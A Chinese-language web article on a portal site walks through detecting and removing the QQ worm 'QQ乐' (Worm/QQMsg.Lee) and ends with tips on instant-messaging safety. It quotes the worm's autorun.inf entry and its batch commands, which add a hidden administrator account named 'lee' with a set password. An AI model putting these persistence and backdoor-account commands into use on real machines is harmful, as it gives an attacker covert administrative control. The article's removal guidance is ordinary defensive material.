365网址导航,365webs.com 
滚动新闻:     欢迎在本站投放广告!  [admin  2008年1月19日]        
 | 网站首页 | 365职场指南 | 365教育 | QQ聊 | 影视娱乐 | 365格子 | 365网址导航 | 易流分类信息网 | 
您现在的位置: 365网址导航 >> QQ聊 >> QQ资讯 >> QQ黑客基地 >> 文章正文
教你如何去除QQ的“小尾巴”           
教你如何去除QQ的“小尾巴”
作者:365webs 文章来源:http://365Webs.com/QQ/ 点击数: 更新时间:2007-12-15 3:29:50

笔者最近遇到一个采取另类方式启动的病毒――QQ乐(Worm/QQMsg.Lee),现把一波三折的查杀过程和一些经验写出来,供朋友们参考。

某日在QQ里连续收到一位朋友发来的消息,该消息中都带 
有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。

接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。

正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:

  [autorun]

  open=System32.exe

原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它,内容如下:

  net user lee abcd1234!@# /add

  net localgroup administrators lee /add

通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。

IM病毒防范技巧:

1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。

2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。

当然大家也可以下载QQ尾巴,QQ病毒,QQ木马专杀工具

文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新推荐
    相关文章


    什么是QQ金钻,如何点亮QQ金钻
    教你怎么用QQ表达你的爱
    教你识破机器里是否有QQ木马
    专家教你QQ防盗五大绝招
    教大家如何刷蓝钻(90%可行)
    教你刷精美QQ秀
    如何设置防火墙实现禁用QQ、M
    教你填写有说服力的QQ号码申
    教你如何找回被盗的QQ密码
    教你彻底隐藏腾讯QQ的IP地址

    最热点击
    · 破解QQ密码保护的证件号码
    · 掠夺者截取QQ帐号密码
    · 教大家如何刷蓝钻(90%可行)
    · QQ空间挂木马方法揭秘
    · 免费获取Q币方法剖析
    · 设有密码的Q-ZONE,我照进!!
    · 本地破解QQ密码的原理和方法
    · QQ安全防黑大全
    · 教你刷精美QQ秀
    · 专家教你QQ防盗五大绝招
    · QQ被盗可以这样找回来
    · 关闭系统进程并盗取QQ帐号的木
    · 教你识破机器里是否有QQ木马
    · 本周新发病毒,乱给好友发送Q
    · 教你如何去除QQ的“小尾巴”
    最冷点击
    · 打破QQ好友500人的上限限制
    · QQ密码保护也作祟
    · 用QQ皮肤也能做后门
    · QQ密码保护也作祟
    · 深度剖析QQ密码被盗原因
    · QQ大盗传播技术分析报告及防范
    · 用QQ文件共享漏洞入侵Win2003
    · 火眼金睛识别QQ盗号陷阱
    · 质疑QQ重新激活的真实目的
    · QQ尾巴死灰复燃,五福娃被利用
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    姓 名: * 游客填写  ·注册用户 ·忘记密码
    主 页:
    评 分: 1分 2分 3分 4分 5分
    评论内容:
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 文章搜索 高级搜索
    设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 |
    365网络 Copyright © 2001-2011 365webs.com All Rights Reserved 365webs
    信息产业部备案
    豫ICP备07004598号